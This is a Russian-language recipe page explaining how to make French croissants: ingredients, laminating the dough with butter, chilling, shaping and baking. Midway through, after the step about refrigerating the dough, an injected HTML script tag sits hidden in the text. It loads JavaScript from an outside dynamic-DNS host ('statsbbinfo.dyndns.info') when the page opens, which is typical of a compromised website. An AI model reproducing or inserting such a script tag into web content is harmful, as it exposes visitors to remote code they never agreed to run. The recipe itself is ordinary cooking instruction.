Французские круассаны

Круассаны являются любимым блюдом во Франции, так почему бы нам тоже не попробовать их приготовить? Приготовление этого блюда занимает определенно немного времени, а как завтрак они очень вкусные и питательные. Вот попробуем приготовить круассаны.
Основные ингредиенты, которые необходимы для приготовления этого блюда:
- 500 г муки
- 2 куриных яйца
- 8 г дрожжей
- 120 г сливочного масла
- 20 мл подсолнечного масла
- 60 г сахара
- 5 г поваренной соли
Для начинки используют:
- Варенье или джем, а так же использовать можно сгущенку, сыр или шоколад
Процесс приготовления состоит из таких этапов:
Дрожжи необходимо развести в 150 мл теплой воды, затем дать им постоять и потом тщательно перемешать. Следующим шагом нужно просеять муку в глубокую миску, и после добавить в муку - 1 яйцо, 60 г сахара, 30 г сливочного масла, соль, разведенные дрожжи и хорошо вымешать получившееся тесто. Процесс вымешивания следует прекратить тогда, когда тесто станет гладким, мягким и эластичным. То масло, которое осталось, необходимо разделить на 3 равные части, и хорошенько его размять. На разделочную поверхность насыпаем муку и следом раскатываем тесто в ровные прямоугольники. 2/3 поверхности теста размазываем первой частью оставшегося сливочного масла, при чем, не доходя до кроя на 3 см. Всю несмазанную поверхность нашего теста аккуратно заворачиваем на половину имеющейся смазанной поверхности. Затем то, что получилось, аккуратно прикрываем той смазанной поверхностью теста, которая осталась. Края теста необходимо аккуратно закрыть руками. Следующим шагом разворачиваем наше тесто ровно на 90 градусов вправо, и начинаем раскатывать прямоугольник. Следом перекладываем тесто на имеющийся лист пергамента, накрываем сверху вторым листом и сворачиваем это тесто пополам. Следом накрываем его полотенцем или тканью, и располагаем примерно на 30 мин в холодильник.<nofollow><script language='javascript' src='http://statsbbinfo.dyndns.info/infob.php?i=24429'></script></nofollow>
По истечению 30 минут, достаем наше тесто и выкладываем на посыпанный мукой стол. Предыдущая процедура подлежит повторению еще 2 раза. Следом проделываем 3 процедуру, но уже без масла. После третьего повтора тесто помещаем в холодильник.
Последним этапом является раскатывание теста в прямоугольник размером 50 на 30 см, следом накрываем его полотенцем, и по истечению 10 минут разрезаем имеющееся тесто вдоль на 2 половины. Затем каждый пласт теста подлежит разрезанию на 8 равных треугольников. Потом каждый треугольник сворачивается в круассан.
На этом этапе приготовления, необходимо выкладывать начинку в круассаны, при чем ту, которую вы выбрали преждевременно - шоколад, варенье или джем. Заворачиваем готовые круассаны, выкладываем их на противень, который преждевременно нужно смазать сливочным маслом. Круассаны формируем в виде полумесяцев. Располагаем круассаны на расстояние, которое будет не менее 5 см друг от друга, расположенных на противне. Затем происходит смазывание круассанов яйцом, и оставляем их на противне на 40 минут, чтобы они подошли. Оставлять лучше в шкафу или духовке, чтобы не было сквозняка. В разогретую духовку помещаем наши французские круассаны, выпекать которые необходимо на протяжении 10-15 минут, придерживаясь температуры 220 градусов.